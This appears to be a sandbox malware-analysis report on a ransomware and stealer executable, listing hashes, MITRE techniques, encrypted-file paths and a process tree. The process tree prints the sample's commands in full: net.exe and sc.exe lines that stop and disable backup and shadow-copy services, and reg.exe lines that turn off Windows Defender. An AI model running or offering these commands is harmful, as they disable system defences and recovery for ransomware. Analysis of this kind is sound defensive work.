af9e8f301a3677b457345921d7ee765a842eceb7df107714eaffc6193bfc6bbe

Resubmissions

23-12-2022 20:19

221223-y39gvahb28 10

23-12-2022 19:54

221223-ymz88scc8w 10

23-12-2022 19:42

221223-yerbcsha78 10

Analysis

max time kernel
134s
max time network
47s
platform
windows7_x64
resource
win7-20220812-en
resource tags

arch:x64arch:x86image:win7-20220812-enlocale:en-usos:windows7-x64system
submitted
23-12-2022 19:42

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

211xahcou.exe
Size

3.9MB
MD5

0e4d44dde522c07d09d9e3086cfae803
SHA1

d8dc26e2094869a0da78ecb47494c931419302dc
SHA256

33aceb3dc0681a56226d4cfce32eee7a431e66f5c746a4d6dc7506a72b317277
SHA512

ac1f269b028217210a72fc5c2e0cb07461e2ff896f8b5ba65771787f99ec34b0f9951cf73d9d387086f79c348c343d147aebc2fd5b7e18da009bc2041e2eee06
SSDEEP

49152:e2NiZPNNirb/T2vO90dL3BmAFd4A64nsfJk0NuXCdmTQb0/6VCrrPrsbg11VgWA2:e2ANB04yIa0hsirubO

Score

10^/10

evasion ransomware spyware stealer trojan

Malware Config

Signatures

Deletes Windows Defender Definitions 2 TTPs 1 IoCs

Uses mpcmdrun utility to delete all AV definitions.

evasion

Impair Defenses

T1562

Command-Line Interface

T1059

pid	Process
1160	MpCmdRun.exe

Modifies Windows Defender Real-time Protection settings 3 TTPs 10 IoCs

evasion trojan

Modify Registry

T1112

Modify Existing Service

T1031

Disabling Security Tools

T1089

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1"	reg.exe
Key created	\REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1"	reg.exe
Key created	\REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Key created	\REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1"	reg.exe
Key created	\REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1"	reg.exe
Key created	\REGISTRY\MACHINE\Software\Policies\Microsoft\Windows Defender\Real-Time Protection	reg.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1"	reg.exe

Modifies security service 2 TTPs 1 IoCs

evasion

Modify Registry

T1112

Modify Existing Service

T1031

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\WinDefend\Start = "4"	reg.exe

Clears Windows event logs 1 TTPs 3 IoCs

evasion ransomware

Indicator Removal on Host

T1070

pid	Process
1648	wevtutil.exe
1652	wevtutil.exe
1480	wevtutil.exe

Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
ransomware

File Deletion
T1107

Inhibit System Recovery
T1490

Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs

ransomware evasion

Inhibit System Recovery

T1490

pid	Process
1792	bcdedit.exe
1604	bcdedit.exe

Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

Drops file in Program Files directory 64 IoCs

description	ioc	Process
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\FD02071_.WMF.mtQuWCYuc39K-3Hg-PPBYf0Hv7tB7KDTE_NRFaoMcGT_AAAAAAAAAAA0.cv2gj	211xahcou.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\DGCINFO.XML.mtQuWCYuc39K-3Hg-PPBYf0Hv7tB7KDTE_NRFaoMcGT_IAAAACAAAAA0.cv2gj	211xahcou.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD15019_.GIF.mtQuWCYuc39K-3Hg-PPBYf0Hv7tB7KDTE_NRFaoMcGT_AAAAAAAAAAA0.cv2gj	211xahcou.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Argentina\San_Luis.mtQuWCYuc39K-3Hg-PPBYf0Hv7tB7KDTE_NRFaoMcGT_IAAAACAAAAA0.cv2gj	211xahcou.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\VDKHome\ENU\VDK10.STP.mtQuWCYuc39K-3Hg-PPBYf0Hv7tB7KDTE_NRFaoMcGT_IAAAACAAAAA0.cv2gj	211xahcou.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\PDIR20F.GIF.mtQuWCYuc39K-3Hg-PPBYf0Hv7tB7KDTE_NRFaoMcGT_AAAAAAAAAAA0.cv2gj	211xahcou.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\DD01143_.WMF.mtQuWCYuc39K-3Hg-PPBYf0Hv7tB7KDTE_NRFaoMcGT_AAAAAAAAAAA0.cv2gj	211xahcou.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SCHOL_02.MID.mtQuWCYuc39K-3Hg-PPBYf0Hv7tB7KDTE_NRFaoMcGT_AAAAAAAAAAA0.cv2gj	211xahcou.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Effects\Slipstream.eftx.mtQuWCYuc39K-3Hg-PPBYf0Hv7tB7KDTE_NRFaoMcGT_AAAAAAAAAAA0.cv2gj	211xahcou.exe
File opened for modification	C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\it-IT\js\settings.js	211xahcou.exe
File opened for modification	C:\Program Files\DVD Maker\Shared\DvdStyles\photoedge_buttongraphic.png	211xahcou.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\THIRDPARTYLICENSEREADME-JAVAFX.txt.mtQuWCYuc39K-3Hg-PPBYf0Hv7tB7KDTE_NRFaoMcGT_AAAAAAAAAAA0.cv2gj	211xahcou.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\org-netbeans-modules-profiler-snaptracer.jar.mtQuWCYuc39K-3Hg-PPBYf0Hv7tB7KDTE_NRFaoMcGT_AAAAAAAAAAA0.cv2gj	211xahcou.exe
File opened for modification	C:\Program Files (x86)\Adobe\Reader 9.0\Reader\plug_ins\Multimedia\MPP\MCIMPP.mpp.mtQuWCYuc39K-3Hg-PPBYf0Hv7tB7KDTE_NRFaoMcGT_AAAAAAAAAAA0.cv2gj	211xahcou.exe
File opened for modification	C:\Program Files\DVD Maker\directshowtap.ax	211xahcou.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-modules-print.xml.mtQuWCYuc39K-3Hg-PPBYf0Hv7tB7KDTE_NRFaoMcGT_AAAAAAAAAAA0.cv2gj	211xahcou.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\HH00636_.WMF.mtQuWCYuc39K-3Hg-PPBYf0Hv7tB7KDTE_NRFaoMcGT_AAAAAAAAAAA0.cv2gj	211xahcou.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0199307.WMF.mtQuWCYuc39K-3Hg-PPBYf0Hv7tB7KDTE_NRFaoMcGT_AAAAAAAAAAA0.cv2gj	211xahcou.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Bibliography\Style\GostTitle.XSL.mtQuWCYuc39K-3Hg-PPBYf0Hv7tB7KDTE_NRFaoMcGT_AAAAAAAAAAA0.cv2gj	211xahcou.exe
File opened for modification	C:\Program Files\DVD Maker\Shared\DvdStyles\Shatter\NavigationLeft_ButtonGraphic.png	211xahcou.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\VERSION.txt.mtQuWCYuc39K-3Hg-PPBYf0Hv7tB7KDTE_NRFaoMcGT_IAAAACAAAAA0.cv2gj	211xahcou.exe
File opened for modification	C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\fr-FR\js\settings.js	211xahcou.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SY00642_.WMF.mtQuWCYuc39K-3Hg-PPBYf0Hv7tB7KDTE_NRFaoMcGT_AAAAAAAAAAA0.cv2gj	211xahcou.exe
File opened for modification	C:\Program Files\DVD Maker\Shared\DvdStyles\ResizingPanels\bandwidth.png	211xahcou.exe
File opened for modification	C:\Program Files\Java\jre7\lib\fonts\LucidaTypewriterRegular.ttf.mtQuWCYuc39K-3Hg-PPBYf0Hv7tB7KDTE_NRFaoMcGT_AAAAAAAAAAA0.cv2gj	211xahcou.exe
File opened for modification	C:\Program Files\Windows Sidebar\Gadgets\RSSFeeds.Gadget\de-DE\css\RSSFeeds.css	211xahcou.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms3\FormsPreviewTemplate.html.mtQuWCYuc39K-3Hg-PPBYf0Hv7tB7KDTE_NRFaoMcGT_AAAAAAAAAAA0.cv2gj	211xahcou.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\MSCOL11.INF.mtQuWCYuc39K-3Hg-PPBYf0Hv7tB7KDTE_NRFaoMcGT_AAAAAAAAAAA0.cv2gj	211xahcou.exe
File opened for modification	C:\Program Files (x86)\Windows Sidebar\Gadgets\Clock.Gadget\images\modern_dot.png	211xahcou.exe
File opened for modification	C:\Program Files (x86)\Windows Sidebar\Gadgets\SlideShow.Gadget\images\prev_rest.png	211xahcou.exe
File opened for modification	C:\Program Files\DVD Maker\Shared\DvdStyles\BabyBoy\BabyBoyMainToScenesBackground_PAL.wmv	211xahcou.exe
File opened for modification	C:\Program Files\DVD Maker\Shared\DvdStyles\NavigationUp_ButtonGraphic.png	211xahcou.exe
File opened for modification	C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\square.png	211xahcou.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO00918_.WMF.mtQuWCYuc39K-3Hg-PPBYf0Hv7tB7KDTE_NRFaoMcGT_AAAAAAAAAAA0.cv2gj	211xahcou.exe
File opened for modification	C:\Program Files (x86)\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\fr-FR\css\picturePuzzle.css	211xahcou.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\FD00090_.WMF.mtQuWCYuc39K-3Hg-PPBYf0Hv7tB7KDTE_NRFaoMcGT_AAAAAAAAAAA0.cv2gj	211xahcou.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0400004.PNG.mtQuWCYuc39K-3Hg-PPBYf0Hv7tB7KDTE_NRFaoMcGT_AAAAAAAAAAA0.cv2gj	211xahcou.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBFTSCM\SCHEME50.CSS.mtQuWCYuc39K-3Hg-PPBYf0Hv7tB7KDTE_NRFaoMcGT_AAAAAAAAAAA0.cv2gj	211xahcou.exe
File opened for modification	C:\Program Files (x86)\Windows Sidebar\Gadgets\Currency.Gadget\ja-JP\css\currency.css	211xahcou.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0103850.WMF.mtQuWCYuc39K-3Hg-PPBYf0Hv7tB7KDTE_NRFaoMcGT_AAAAAAAAAAA0.cv2gj	211xahcou.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\SO00768_.WMF.mtQuWCYuc39K-3Hg-PPBYf0Hv7tB7KDTE_NRFaoMcGT_AAAAAAAAAAA0.cv2gj	211xahcou.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\1033\PUBSPAPR\ZPDIR44F.GIF.mtQuWCYuc39K-3Hg-PPBYf0Hv7tB7KDTE_NRFaoMcGT_AAAAAAAAAAA0.cv2gj	211xahcou.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\GrayCheck\TAB_OFF.GIF.mtQuWCYuc39K-3Hg-PPBYf0Hv7tB7KDTE_NRFaoMcGT_AAAAAAAAAAA0.cv2gj	211xahcou.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-awt_ja.jar.mtQuWCYuc39K-3Hg-PPBYf0Hv7tB7KDTE_NRFaoMcGT_AAAAAAAAAAA0.cv2gj	211xahcou.exe
File opened for modification	C:\Program Files\Microsoft Games\Mahjong\de-DE\Mahjong.exe.mui.mtQuWCYuc39K-3Hg-PPBYf0Hv7tB7KDTE_NRFaoMcGT_IAAAACAAAAA0.cv2gj	211xahcou.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\Modules\org-netbeans-core-ui.xml.mtQuWCYuc39K-3Hg-PPBYf0Hv7tB7KDTE_NRFaoMcGT_AAAAAAAAAAA0.cv2gj	211xahcou.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-openide-actions_zh_CN.jar.mtQuWCYuc39K-3Hg-PPBYf0Hv7tB7KDTE_NRFaoMcGT_AAAAAAAAAAA0.cv2gj	211xahcou.exe
File opened for modification	C:\Program Files\Java\jre7\lib\zi\Europe\Monaco.mtQuWCYuc39K-3Hg-PPBYf0Hv7tB7KDTE_NRFaoMcGT_AAAAAAAAAAA0.cv2gj	211xahcou.exe
File opened for modification	C:\Program Files\Windows Sidebar\Gadgets\Calendar.Gadget\ja-JP\gadget.xml	211xahcou.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\BD20013_.WMF.mtQuWCYuc39K-3Hg-PPBYf0Hv7tB7KDTE_NRFaoMcGT_AAAAAAAAAAA0.cv2gj	211xahcou.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0305493.WMF.mtQuWCYuc39K-3Hg-PPBYf0Hv7tB7KDTE_NRFaoMcGT_AAAAAAAAAAA0.cv2gj	211xahcou.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\rtf_spellcheck.gif.mtQuWCYuc39K-3Hg-PPBYf0Hv7tB7KDTE_NRFaoMcGT_AAAAAAAAAAA0.cv2gj	211xahcou.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\SIDBAR98.POC.mtQuWCYuc39K-3Hg-PPBYf0Hv7tB7KDTE_NRFaoMcGT_AAAAAAAAAAA0.cv2gj	211xahcou.exe
File opened for modification	C:\Program Files\Common Files\Microsoft Shared\ink\fsdefinitions\oskpred\oskpredbase.xml	211xahcou.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Argentina\Tucuman.mtQuWCYuc39K-3Hg-PPBYf0Hv7tB7KDTE_NRFaoMcGT_IAAAACAAAAA0.cv2gj	211xahcou.exe
File opened for modification	C:\Program Files (x86)\Common Files\System\msadc\handsafe.reg	211xahcou.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0239063.WMF.mtQuWCYuc39K-3Hg-PPBYf0Hv7tB7KDTE_NRFaoMcGT_IAAAACAAAAA0.cv2gj	211xahcou.exe
File opened for modification	C:\Program Files\Common Files\System\msadc\en-US\msadcfr.dll.mui	211xahcou.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\IN00957_.WMF.mtQuWCYuc39K-3Hg-PPBYf0Hv7tB7KDTE_NRFaoMcGT_AAAAAAAAAAA0.cv2gj	211xahcou.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0152556.WMF.mtQuWCYuc39K-3Hg-PPBYf0Hv7tB7KDTE_NRFaoMcGT_AAAAAAAAAAA0.cv2gj	211xahcou.exe
File opened for modification	C:\Program Files (x86)\Windows Sidebar\Gadgets\SlideShow.Gadget\de-DE\gadget.xml	211xahcou.exe
File opened for modification	C:\Program Files (x86)\Microsoft Office\MEDIA\CAGCAT10\J0183290.WMF.mtQuWCYuc39K-3Hg-PPBYf0Hv7tB7KDTE_NRFaoMcGT_AAAAAAAAAAA0.cv2gj	211xahcou.exe
File opened for modification	C:\Program Files\Common Files\Microsoft Shared\ink\ipsdan.xml	211xahcou.exe
File opened for modification	C:\Program Files\Java\jdk1.7.0_80\db\lib\derbyrun.jar.mtQuWCYuc39K-3Hg-PPBYf0Hv7tB7KDTE_NRFaoMcGT_IAAAACAAAAA0.cv2gj	211xahcou.exe

Launches sc.exe 8 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
1716	sc.exe
1432	sc.exe
1940	sc.exe
1992	sc.exe
1420	sc.exe
880	sc.exe
1528	sc.exe
1956	sc.exe

Interacts with shadow copies 2 TTPs 1 IoCs

Shadow copies are often targeted by ransomware to inhibit system recovery.

ransomware

File Deletion

T1107

Inhibit System Recovery

T1490

pid	Process
756	vssadmin.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 3 IoCs

pid	Process
1812	powershell.exe
1768	powershell.exe
896	211xahcou.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeSecurityPrivilege	1648	wevtutil.exe
Token: SeBackupPrivilege	1648	wevtutil.exe
Token: SeSecurityPrivilege	1652	wevtutil.exe
Token: SeBackupPrivilege	1652	wevtutil.exe
Token: SeSecurityPrivilege	1480	wevtutil.exe
Token: SeBackupPrivilege	1480	wevtutil.exe
Token: SeIncreaseQuotaPrivilege	944	wmic.exe
Token: SeSecurityPrivilege	944	wmic.exe
Token: SeTakeOwnershipPrivilege	944	wmic.exe
Token: SeLoadDriverPrivilege	944	wmic.exe
Token: SeSystemProfilePrivilege	944	wmic.exe
Token: SeSystemtimePrivilege	944	wmic.exe
Token: SeProfSingleProcessPrivilege	944	wmic.exe
Token: SeIncBasePriorityPrivilege	944	wmic.exe
Token: SeCreatePagefilePrivilege	944	wmic.exe
Token: SeBackupPrivilege	944	wmic.exe
Token: SeRestorePrivilege	944	wmic.exe
Token: SeShutdownPrivilege	944	wmic.exe
Token: SeDebugPrivilege	944	wmic.exe
Token: SeSystemEnvironmentPrivilege	944	wmic.exe
Token: SeRemoteShutdownPrivilege	944	wmic.exe
Token: SeUndockPrivilege	944	wmic.exe
Token: SeManageVolumePrivilege	944	wmic.exe
Token: 33	944	wmic.exe
Token: 34	944	wmic.exe
Token: 35	944	wmic.exe
Token: SeIncreaseQuotaPrivilege	1968	wmic.exe
Token: SeSecurityPrivilege	1968	wmic.exe
Token: SeTakeOwnershipPrivilege	1968	wmic.exe
Token: SeLoadDriverPrivilege	1968	wmic.exe
Token: SeSystemProfilePrivilege	1968	wmic.exe
Token: SeSystemtimePrivilege	1968	wmic.exe
Token: SeProfSingleProcessPrivilege	1968	wmic.exe
Token: SeIncBasePriorityPrivilege	1968	wmic.exe
Token: SeCreatePagefilePrivilege	1968	wmic.exe
Token: SeBackupPrivilege	1968	wmic.exe
Token: SeRestorePrivilege	1968	wmic.exe
Token: SeShutdownPrivilege	1968	wmic.exe
Token: SeDebugPrivilege	1968	wmic.exe
Token: SeSystemEnvironmentPrivilege	1968	wmic.exe
Token: SeRemoteShutdownPrivilege	1968	wmic.exe
Token: SeUndockPrivilege	1968	wmic.exe
Token: SeManageVolumePrivilege	1968	wmic.exe
Token: 33	1968	wmic.exe
Token: 34	1968	wmic.exe
Token: 35	1968	wmic.exe
Token: SeIncreaseQuotaPrivilege	1968	wmic.exe
Token: SeSecurityPrivilege	1968	wmic.exe
Token: SeTakeOwnershipPrivilege	1968	wmic.exe
Token: SeLoadDriverPrivilege	1968	wmic.exe
Token: SeSystemProfilePrivilege	1968	wmic.exe
Token: SeSystemtimePrivilege	1968	wmic.exe
Token: SeProfSingleProcessPrivilege	1968	wmic.exe
Token: SeIncBasePriorityPrivilege	1968	wmic.exe
Token: SeCreatePagefilePrivilege	1968	wmic.exe
Token: SeBackupPrivilege	1968	wmic.exe
Token: SeRestorePrivilege	1968	wmic.exe
Token: SeShutdownPrivilege	1968	wmic.exe
Token: SeDebugPrivilege	1968	wmic.exe
Token: SeSystemEnvironmentPrivilege	1968	wmic.exe
Token: SeRemoteShutdownPrivilege	1968	wmic.exe
Token: SeUndockPrivilege	1968	wmic.exe
Token: SeManageVolumePrivilege	1968	wmic.exe
Token: 33	1968	wmic.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 896 wrote to memory of 964	896	211xahcou.exe	26
PID 896 wrote to memory of 964	896	211xahcou.exe	26
PID 896 wrote to memory of 964	896	211xahcou.exe	26
PID 964 wrote to memory of 1480	964	net.exe	28
PID 964 wrote to memory of 1480	964	net.exe	28
PID 964 wrote to memory of 1480	964	net.exe	28
PID 896 wrote to memory of 840	896	211xahcou.exe	29
PID 896 wrote to memory of 840	896	211xahcou.exe	29
PID 896 wrote to memory of 840	896	211xahcou.exe	29
PID 840 wrote to memory of 1392	840	net.exe	31
PID 840 wrote to memory of 1392	840	net.exe	31
PID 840 wrote to memory of 1392	840	net.exe	31
PID 896 wrote to memory of 1152	896	211xahcou.exe	32
PID 896 wrote to memory of 1152	896	211xahcou.exe	32
PID 896 wrote to memory of 1152	896	211xahcou.exe	32
PID 1152 wrote to memory of 1188	1152	net.exe	34
PID 1152 wrote to memory of 1188	1152	net.exe	34
PID 1152 wrote to memory of 1188	1152	net.exe	34
PID 896 wrote to memory of 1816	896	211xahcou.exe	35
PID 896 wrote to memory of 1816	896	211xahcou.exe	35
PID 896 wrote to memory of 1816	896	211xahcou.exe	35
PID 1816 wrote to memory of 1768	1816	net.exe	37
PID 1816 wrote to memory of 1768	1816	net.exe	37
PID 1816 wrote to memory of 1768	1816	net.exe	37
PID 896 wrote to memory of 632	896	211xahcou.exe	38
PID 896 wrote to memory of 632	896	211xahcou.exe	38
PID 896 wrote to memory of 632	896	211xahcou.exe	38
PID 632 wrote to memory of 776	632	net.exe	40
PID 632 wrote to memory of 776	632	net.exe	40
PID 632 wrote to memory of 776	632	net.exe	40
PID 896 wrote to memory of 1692	896	211xahcou.exe	41
PID 896 wrote to memory of 1692	896	211xahcou.exe	41
PID 896 wrote to memory of 1692	896	211xahcou.exe	41
PID 1692 wrote to memory of 336	1692	net.exe	43
PID 1692 wrote to memory of 336	1692	net.exe	43
PID 1692 wrote to memory of 336	1692	net.exe	43
PID 896 wrote to memory of 1100	896	211xahcou.exe	44
PID 896 wrote to memory of 1100	896	211xahcou.exe	44
PID 896 wrote to memory of 1100	896	211xahcou.exe	44
PID 1100 wrote to memory of 1176	1100	net.exe	46
PID 1100 wrote to memory of 1176	1100	net.exe	46
PID 1100 wrote to memory of 1176	1100	net.exe	46
PID 896 wrote to memory of 1564	896	211xahcou.exe	47
PID 896 wrote to memory of 1564	896	211xahcou.exe	47
PID 896 wrote to memory of 1564	896	211xahcou.exe	47
PID 1564 wrote to memory of 1948	1564	net.exe	49
PID 1564 wrote to memory of 1948	1564	net.exe	49
PID 1564 wrote to memory of 1948	1564	net.exe	49
PID 896 wrote to memory of 1432	896	211xahcou.exe	50
PID 896 wrote to memory of 1432	896	211xahcou.exe	50
PID 896 wrote to memory of 1432	896	211xahcou.exe	50
PID 896 wrote to memory of 1940	896	211xahcou.exe	52
PID 896 wrote to memory of 1940	896	211xahcou.exe	52
PID 896 wrote to memory of 1940	896	211xahcou.exe	52
PID 896 wrote to memory of 1992	896	211xahcou.exe	54
PID 896 wrote to memory of 1992	896	211xahcou.exe	54
PID 896 wrote to memory of 1992	896	211xahcou.exe	54
PID 896 wrote to memory of 1420	896	211xahcou.exe	56
PID 896 wrote to memory of 1420	896	211xahcou.exe	56
PID 896 wrote to memory of 1420	896	211xahcou.exe	56
PID 896 wrote to memory of 880	896	211xahcou.exe	58
PID 896 wrote to memory of 880	896	211xahcou.exe	58
PID 896 wrote to memory of 880	896	211xahcou.exe	58
PID 896 wrote to memory of 1528	896	211xahcou.exe	60

C:\Users\Admin\AppData\Local\Temp\211xahcou.exe
"C:\Users\Admin\AppData\Local\Temp\211xahcou.exe"
1⤵
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:896
- C:\Windows\system32\net.exe
  net.exe stop "NetMsmqActivator" /y
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:964
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "NetMsmqActivator" /y
    3⤵
    PID:1480
- C:\Windows\system32\net.exe
  net.exe stop "SamSs" /y
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:840
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "SamSs" /y
    3⤵
    PID:1392
- C:\Windows\system32\net.exe
  net.exe stop "SDRSVC" /y
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1152
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "SDRSVC" /y
    3⤵
    PID:1188
- C:\Windows\system32\net.exe
  net.exe stop "SstpSvc" /y
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1816
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "SstpSvc" /y
    3⤵
    PID:1768
- C:\Windows\system32\net.exe
  net.exe stop "UI0Detect" /y
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:632
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "UI0Detect" /y
    3⤵
    PID:776
- C:\Windows\system32\net.exe
  net.exe stop "VSS" /y
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1692
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "VSS" /y
    3⤵
    PID:336
- C:\Windows\system32\net.exe
  net.exe stop "wbengine" /y
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1100
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "wbengine" /y
    3⤵
    PID:1176
- C:\Windows\system32\net.exe
  net.exe stop "WebClient" /y
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:1564
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 stop "WebClient" /y
    3⤵
    PID:1948
- C:\Windows\system32\sc.exe
  sc.exe config "NetMsmqActivator" start= disabled
  2⤵
  - Launches sc.exe
  PID:1432
- C:\Windows\system32\sc.exe
  sc.exe config "SamSs" start= disabled
  2⤵
  - Launches sc.exe
  PID:1940
- C:\Windows\system32\sc.exe
  sc.exe config "SDRSVC" start= disabled
  2⤵
  - Launches sc.exe
  PID:1992
- C:\Windows\system32\sc.exe
  sc.exe config "SstpSvc" start= disabled
  2⤵
  - Launches sc.exe
  PID:1420
- C:\Windows\system32\sc.exe
  sc.exe config "UI0Detect" start= disabled
  2⤵
  - Launches sc.exe
  PID:880
- C:\Windows\system32\sc.exe
  sc.exe config "VSS" start= disabled
  2⤵
  - Launches sc.exe
  PID:1528
- C:\Windows\system32\sc.exe
  sc.exe config "wbengine" start= disabled
  2⤵
  - Launches sc.exe
  PID:1956
- C:\Windows\system32\sc.exe
  sc.exe config "WebClient" start= disabled
  2⤵
  - Launches sc.exe
  PID:1716
- C:\Windows\system32\reg.exe
  reg.exe add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
  2⤵
  PID:1068
- C:\Windows\system32\reg.exe
  reg.exe delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
  2⤵
  PID:860
- C:\Windows\system32\reg.exe
  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
  2⤵
  PID:1220
- C:\Windows\system32\reg.exe
  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
  2⤵
  PID:816
- C:\Windows\system32\reg.exe
  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
  2⤵
  PID:1756
- C:\Windows\system32\reg.exe
  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f
  2⤵
  - Modifies Windows Defender Real-time Protection settings
  PID:1704
- C:\Windows\system32\reg.exe
  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f
  2⤵
  - Modifies Windows Defender Real-time Protection settings
  PID:1964
- C:\Windows\system32\reg.exe
  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f
  2⤵
  - Modifies Windows Defender Real-time Protection settings
  PID:1196
- C:\Windows\system32\reg.exe
  reg.exe add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f
  2⤵
  - Modifies Windows Defender Real-time Protection settings
  PID:836
- C:\Windows\system32\reg.exe
